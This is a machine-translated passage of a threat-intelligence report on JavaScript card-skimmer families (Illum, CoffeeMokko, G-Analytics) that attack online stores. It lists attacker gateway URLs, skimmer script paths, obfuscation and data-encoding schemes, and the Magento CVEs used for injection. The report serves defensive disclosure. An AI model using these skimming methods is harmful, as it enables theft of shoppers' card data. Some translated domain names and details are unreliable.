Malingana ndi zomwe zapezeka, tingaganize kuti banja la G-Analytics la anthu osuta fodya komanso sitolo yapansi panthaka yogulitsa makadi a banki Makhadi amtundu amayendetsedwa ndi anthu omwewo, ndipo sitolo imagwiritsidwa ntchito kugulitsa makhadi a banki omwe abedwa pogwiritsa ntchito sniffer.

Zachilengedwe

Kasitomala	Tsiku lodziwika/mawonekedwe
iozoz.com	08.04.2016
dittm.org	10.09.2016
jquery-js.com	02.01.2017
g-analytics.com	31.05.2018
google-analytics.is	21.11.2018
analytical.to	04.12.2018
google-analytics.to	06.12.2018
google-analytics.cm	28.12.2018
analytical.is	28.12.2018
google-analytics.cm	17.01.2019

Banja la Illum

Illum ndi banja la onunkhiza omwe amagwiritsidwa ntchito kuukira masitolo apa intaneti omwe akuyendetsa Magento CMS. Kuphatikiza pa kubweretsa nambala yoyipa, ogwiritsa ntchito sniffer iyi amagwiritsanso ntchito kuyambitsa mafomu olipira abodza omwe amatumiza deta kuzipata zomwe zimayang'aniridwa ndi achiwembu.

Posanthula zida zapaintaneti zomwe zimagwiritsidwa ntchito ndi ogwiritsa ntchito sniffer iyi, zolemba zambiri zoyipa, zowononga, mafomu olipira abodza, komanso mndandanda wa zitsanzo zokhala ndi anthu oyipa ochokera kwa omwe akupikisana nawo adadziwika. Kutengera zambiri zamasiku omwe amawonekera kwa mayina omwe amagwiritsidwa ntchito ndi gululi, titha kuganiza kuti kampeni idayamba kumapeto kwa 2016.

Momwe Illum imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti

Mabaibulo oyambirira a sniffer omwe adapezeka adalowetsedwa mwachindunji mu code ya malo osokonezeka. Zomwe zabedwa zidatumizidwa ku cdn.illum[.]pw/records.php, chipatacho chinasindikizidwa pogwiritsa ntchito zoyambira64.

Pambuyo pake, mtundu wapaketi wa sniffer unapezeka womwe umagwiritsa ntchito chipata china - records.nstatistics[.]com/records.php.

Malingana ndi lipoti Willem de Groot, mwiniwakeyo adagwiritsidwa ntchito mu sniffer, yomwe idakhazikitsidwa sitolo webusaiti, ya chipani cha ndale cha ku Germany CSU.

Kuwunika kwawebusayiti ya omwe akuwukira

Akatswiri a Gulu-IB adapeza ndikusanthula tsamba lawebusayiti lomwe gulu la zigawenga limagwiritsa ntchito kusunga zida ndikusonkhanitsa zomwe zabedwa.

Zina mwa zida zomwe zidapezeka pa seva ya omwe akuwukirawo zinali zolembedwa ndi zopezera mwayi wokulirapo mu Linux OS: mwachitsanzo, Linux Privilege Escalation Check Script yopangidwa ndi Mike Czumak, komanso kugwiritsa ntchito CVE-2009-1185.

Owukirawo adagwiritsa ntchito ziwonetsero ziwiri mwachindunji kuukira malo ogulitsa pa intaneti: первый wokhoza kulowetsamo code yoyipa core_config_data pogwiritsa ntchito CVE-2016-4010, wachiwiri imagwiritsa ntchito chiwopsezo cha RCE m'mapulagini a CMS Magento, kulola khodi yosasinthika kuti iwonongeke pa seva yovutikira.

Komanso, pakuwunika kwa seva, zitsanzo zosiyanasiyana za osuta ndi mafomu olipira zabodza adapezeka, omwe amagwiritsidwa ntchito ndi omwe akuwukira kuti atole zidziwitso zolipira kuchokera kumasamba omwe adabedwa. Monga mukuwonera pamndandanda womwe uli pansipa, zolemba zina zidapangidwa payekhapayekha patsamba lililonse lobedwa, pomwe yankho lachilengedwe linagwiritsidwa ntchito pa CMS ina ndi zipata zolipira. Mwachitsanzo, scripts segapay_standart.js и segapay_onpage.js opangidwa kuti akhazikitsidwe pamasamba pogwiritsa ntchito njira yolipirira ya Sage Pay.

Mndandanda wamakalata azipata zosiyanasiyana zolipira

Zolemba	Njira yolipira
sr.illum[.]pw/mjs_special/visiondirect.co.uk.js	//request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/topdierenshop.nl.js	//request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/tiendalenovo.es.js	//request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/pro-bolt.com.js	//request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/plae.co.js	//request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/ottolenghi.co.uk.js	//request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/oldtimecandy.com.js	//request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/mylook.ee.js	//cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs_special/luluandsky.com.js	//request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/julep.com.js	//cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs_special/gymcompany.es.js	//request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/grotekadoshop.nl.js	//request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/fushi.co.uk.js	//request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/fareastflora.com.js	//request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/compuindia.com.js	//request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs/segapay_standart.js	//cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs/segapay_onpage.js	//cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs/replace_standart.js	//request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs/all_inputs.js	//cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs/add_inputs_standart.js	//request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/magento/payment_standart.js	//cdn.illum[.]pw/records.php
sr.illum[.]pw/magento/payment_redirect.js	//payrightnow[.]cf/?malipiro=
sr.illum[.]pw/magento/payment_redcrypt.js	//payrightnow[.]cf/?malipiro=
sr.illum[.]pw/magento/payment_forminsite.js	//paymentnow[.]tk/?malipiro=

Wolandira paynow[.]tk, yogwiritsidwa ntchito ngati chipata mu script pay_forminsite.js, idapezeka ngati subjectAltName mumasitifiketi angapo okhudzana ndi ntchito ya CloudFlare. Kuphatikiza apo, woyang'anirayo anali ndi script zoipa.js. Kutengera dzina la script, itha kugwiritsidwa ntchito ngati gawo lakugwiritsa ntchito CVE-2016-4010, chifukwa ndizotheka kubaya code yoyipa m'munsi mwa tsamba lomwe lili ndi CMS Magento. Wolandirayo adagwiritsa ntchito script iyi ngati chipata request.requestnet[.]tkkugwiritsa ntchito satifiketi yofanana ndi yolandila paynow[.]tk.

Mafomu olipira abodza

Chithunzi chomwe chili pansipa chikuwonetsa chitsanzo cha fomu yolowetsa deta yamakhadi. Fomu iyi idagwiritsidwa ntchito kulowetsa sitolo yapaintaneti ndikuba data yamakhadi.

Chithunzi chotsatirachi chikuwonetsa chitsanzo cha fomu yolipira ya PayPal yabodza yomwe idagwiritsidwa ntchito ndi achiwembu kulowa patsamba ndi njira yolipirayi.

Zachilengedwe

Kasitomala	Tsiku lodziwika/mawonekedwe
cdn.illum.pw	27/11/2016
records.nstatistics.com	06/09/2018
request.payrightnow.cf	25/05/2018
paynow.tk	16/07/2017
payline.tk	01/03/2018
paypal.cf	04/09/2017
requestnet.tk	28/06/2017

Banja la CoffeeMokko

Banja la CoffeMokko la onunkhiza, lopangidwa kuti libe makadi aku banki kwa ogwiritsa ntchito sitolo ya pa intaneti, lakhala likugwiritsidwa ntchito kuyambira Meyi 2017. Zikuoneka kuti omwe amagwira ntchito m'banja la osutawa ndi gulu la zigawenga Gulu 1, lofotokozedwa ndi akatswiri a RiskIQ mu 2016. Masamba omwe ali ndi ma CMS monga Magento, OpenCart, WordPress, osCommerce, ndi Shopify adawukiridwa.

Momwe CoffeMokko imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti

Othandizira banja ili amapanga zonunkhiza zapadera pa matenda aliwonse: fayilo ya sniffer ili m'ndandanda. src kapena js pa seva ya owukira. Kuphatikizika mu code yatsamba kumachitika kudzera pa ulalo wolunjika kwa sniffer.

Khodi ya sniffer hardcodes mayina a magawo a fomu omwe deta iyenera kubedwa. Wonunkhiza amayang'ananso ngati wogwiritsa ntchitoyo ali patsamba lolipira poyang'ana mndandanda wa mawu osakira ndi adilesi yaposachedwa ya wogwiritsa ntchito.

Mabaibulo ena omwe anatulukira a sniffer adasokonezedwa ndipo anali ndi chingwe chobisika momwe zida zazikuluzikulu zimasungidwa: munali mayina a mafomu a machitidwe osiyanasiyana olipira, komanso adiresi yachipata kumene deta yobedwa iyenera kutumizidwa.

Zomwe zabedwa zolipira zidatumizidwa ku script pa seva ya owukira panjira /savePayment/index.php kapena /tr/index.php. Mwinamwake, script iyi imagwiritsidwa ntchito kutumiza deta kuchokera pachipata kupita ku seva yaikulu, yomwe imagwirizanitsa deta kuchokera kwa onse osuta. Kubisa zomwe zatumizidwa, zidziwitso zonse zolipira za wozunzidwayo zimasungidwa pogwiritsa ntchito zoyambira64, kenako kusinthana kwa zilembo zingapo kumachitika:

zilembo za "e" zasinthidwa ndi ":"
chizindikiro cha "w" chasinthidwa ndi "+"
zilembo za "o" zasinthidwa ndi "%"
zilembo za "d" zasinthidwa ndi "#"
khalidwe "a" m'malo ndi "-"
chizindikiro "7" chasinthidwa ndi "^"
"h" wasinthidwa ndi "_"
chizindikiro cha "T" chasinthidwa ndi "@"
khalidwe "0" m'malo ndi "/"
zilembo za "Y" zasinthidwa ndi "*"

Chifukwa cha kusintha kwa zilembo zomwe zimagwiritsidwa ntchito zoyambira64 Zambiri sizingasinthidwe popanda kusinthanso.

Umu ndi momwe kachidutswa kakang'ono kachidutswa kakang'ono kamene sikadasokonezedwe kakuwoneka ngati:

Infrastructure Analysis

M'makampeni oyambilira, owukira adalembetsa mayina amadomeni ofanana ndi a malo ogulitsa pa intaneti ovomerezeka. Madera awo amatha kusiyana ndi ovomerezeka ndi chizindikiro chimodzi kapena TLD ina. Madomeni olembetsedwa adagwiritsidwa ntchito kusunga khodi ya sniffer, ulalo womwe udayikidwa mu khodi ya sitolo.

Gululi linagwiritsanso ntchito mayina a mayina monga mapulagini otchuka a jQuery (slickjs[.]org kwa masamba ogwiritsa ntchito pulogalamu yowonjezera slick.js), njira zolipira (sagecdn[.]org kwa masamba omwe amagwiritsa ntchito njira yolipirira ya Sage Pay).

Pambuyo pake, gululi lidayamba kupanga madambwe omwe mayina awo analibe chochita ndi sitolo kapena mutu wa sitolo.

Chigawo chilichonse chimagwirizana ndi malo omwe chikwatucho chinapangidwira /js kapena /src. Zolemba za Sniffer zidasungidwa mu bukhuli: sniffer imodzi pa matenda atsopano aliwonse. Wowomberayo adayikidwa mu code ya webusayiti kudzera pa ulalo wachindunji, koma nthawi zina, owukira adasintha imodzi mwamafayilo awebusayiti ndikuwonjezera nambala yoyipa kwa iyo.

Kodi Analysis

Algorithm yoyamba ya obfuscation

M'zitsanzo zina zomwe zapezeka za onunkhiza abanja ili, nambalayo idasokonezedwa ndipo ili ndi chidziwitso chobisika chofunikira kuti wosutayo agwire ntchito: makamaka, adilesi yachipata cha sniffer, mndandanda wa minda yolipira, ndipo nthawi zina, nambala yabodza. fomu yolipira. Mu code yomwe ili mkati mwa ntchitoyi, zothandizira zidasungidwa pogwiritsa ntchito XOR ndi kiyi yomwe idaperekedwa ngati mtsutso ku ntchito yomweyo.

Pochotsa chingwecho ndi kiyi yoyenera, yapadera pa chitsanzo chilichonse, mutha kupeza chingwe chomwe chili ndi zingwe zonse kuchokera ku code sniffer yolekanitsidwa ndi olekanitsa.

Algorithm yachiwiri ya obfuscation

M'zitsanzo zamtsogolo za onunkhiza a banja ili, njira yosiyana ya obfuscation idagwiritsidwa ntchito: pamenepa, deta idabisidwa pogwiritsa ntchito algorithm yodzilemba yokha. Chingwe chokhala ndi data yobisika yofunikira kuti wosutayo agwiritse ntchito adaperekedwa ngati mtsutso ku ntchito yomasulira.

Pogwiritsa ntchito msakatuli wa msakatuli, mutha kutsitsa deta yosungidwa ndikupeza mndandanda womwe uli ndi zida zonunkhiza.

Kulumikizana ndi kuukira koyambirira kwa MageCart

Pakuwunika kwa madera omwe gululo limagwiritsidwa ntchito ngati chipata chotengera zomwe zabedwa, zidapezeka kuti derali lili ndi zida zakuba kwa kirediti kadi, zofanana ndi zomwe zimagwiritsidwa ntchito ndi Gulu 1, limodzi mwamagulu oyamba, anapeza ndi akatswiri a RiskIQ.

Mafayilo awiri adapezeka pagulu la osuta a CoffeMokko:

mage.js - Fayilo yomwe ili ndi kachidindo ka Gulu 1 kamene kali ndi adilesi yachipata js-cdn.link
mag.php - PHP script yomwe ili ndi udindo wosonkhanitsa zomwe zabedwa ndi wosuta

Zomwe zili mufayilo ya mage.js
Zinatsimikiziridwanso kuti madera oyambirira omwe amagwiritsidwa ntchito ndi gulu lomwe lili kumbuyo kwa banja la CoffeMokko la osuta adalembetsedwa pa May 17, 2017:

link-js[.] ulalo
info-js[.]uthenga
track-js[.] ulalo
map-js[.]uthenga
smart-js[.]uthenga

Maonekedwe a mayina a mayinawa akufanana ndi mayina a mayina a Gulu 1 omwe adagwiritsidwa ntchito muzowukira za 2016.

Kutengera zomwe zapezedwa, titha kuganiza kuti pali kulumikizana pakati pa ogwiritsa ntchito CoffeMokko sniffers ndi gulu lachigawenga Gulu 1. Mwinamwake, ogwira ntchito ku CoffeMokko akanatha kubwereka zida ndi mapulogalamu kuchokera kwa omwe adawatsogolera kuti abe makadi. Komabe, zikutheka kuti gulu lachigawenga lomwe limagwiritsa ntchito banja la CoffeMokko la osuta ndi anthu omwewo omwe adachita zigawenga za Gulu 1. Kutsatira kusindikizidwa kwa lipoti loyamba la zochitika za gulu lachigawenga, mayina awo onse ankalamulira. otsekedwa ndipo zida zinaphunziridwa mwatsatanetsatane ndikufotokozedwa. Gululo lidakakamizidwa kuti lipume pang'ono, kuyeretsa zida zake zamkati ndikulembanso code ya sniffer kuti apitilize kuwukira ndikukhala osazindikirika.

Zachilengedwe

Kasitomala	Tsiku lodziwika/mawonekedwe
link-js.link	17.05.2017
info-js.link	17.05.2017
track-js.link	17.05.2017
map-js.link	17.05.2017
smart-js.link	17.05.2017
adorebeauty.org	03.09.2017
chitetezo-malipiro.su	03.09.2017
braincdn.org	04.09.2017
sagecdn.org	04.09.2017
slickjs.org	04.09.2017
oakandfort.org	10.09.2017
citywnery.org	15.09.2017
dobell.su	04.10.2017
anasplayclothing.org	31.10.2017
jewsondirect.com	05.11.2017
shop-rnib.org	15.11.2017
closetlondon.org	16.11.2017
misshaus.org	28.11.2017
battery-force.org	01.12.2017
kik-vape.org	01.12.2017
greatfurnituretradingco.org	02.12.2017
etradesupply.org	04.12.2017
replacemyremote.org	04.12.2017
all-about-sneakers.org	05.12.2017
mage-checkout.org	05.12.2017
nililotan.org	07.12.2017
lamoodbighat.net	08.12.2017
walletgear.org	10.12.2017
dahlie.org	12.12.2017
davidsfootwear.org	20.12.2017
blackriverrimaging.org	23.12.2017
exrpesso.org	02.01.2018
parks.su	09.01.2018
pmtonline.su	12.01.2018
otocap.org	15.01.2018
christohperward.org	27.01.2018
coffetea.org	31.01.2018
energycoffe.org	31.01.2018
energytea.org	31.01.2018
teacoffe.net	31.01.2018
adaptivecss.org	01.03.2018
coffemokko.com	01.03.2018
londontea.net	01.03.2018
ukcoffe.com	01.03.2018
labbe.biz	20.03.2018
batterynart.com	03.04.2018
btosports.net	09.04.2018
chicksaddlery.net	16.04.2018
paypay.org	11.05.2018
ar500arnor.com	26.05.2018
authorizecdn.com	28.05.2018
slickmin.com	28.05.2018
bannerbuzz.info	03.06.2018
kandypens.net	08.06.2018
mylrendyphone.com	15.06.2018
freshchat.info	01.07.2018
3lift.org	02.07.2018
abtasty.net	02.07.2018
mechat.info	02.07.2018
zoplm.com	02.07.2018
zapaljs.com	02.09.2018
foodandcot.com	15.09.2018
freshdepor.com	15.09.2018
swappastore.com	15.09.2018
verywellfitnesse.com	15.09.2018
elegrina.com	18.11.2018
majsurplus.com	19.11.2018
Top5value.com	19.11.2018

Source: www.habr.com

Makanema anayi a JavaScript omwe amakudikirirani m'masitolo apaintaneti

"Zowopsa zobisika"

ReactGet Banja

Momwe ReactGet imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti

Kusanthula Baibulo

Wonunkhiza mawu achinsinsi

Kudutsana ndi ImageID sniffer

Wonunkhiza wapadziko lonse

Ndi zida zotani zomwe zimagwiritsidwa ntchito pobera zidziwitso zamalipiro?

Kuukira kwa Phishing

G-Analytics Banja

Momwe G-Analytics imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti

Kusanthula Baibulo

Kupanga ndalama kwa data yabedwa

Banja la Illum

Momwe Illum imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti

Kuwunika kwawebusayiti ya omwe akuwukira

Mafomu olipira abodza

Banja la CoffeeMokko

Momwe CoffeMokko imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti

Infrastructure Analysis

Kodi Analysis

Algorithm yoyamba ya obfuscation

Algorithm yachiwiri ya obfuscation

Kulumikizana ndi kuukira koyambirira kwa MageCart

Kuwonjezera ndemanga kuletsa reply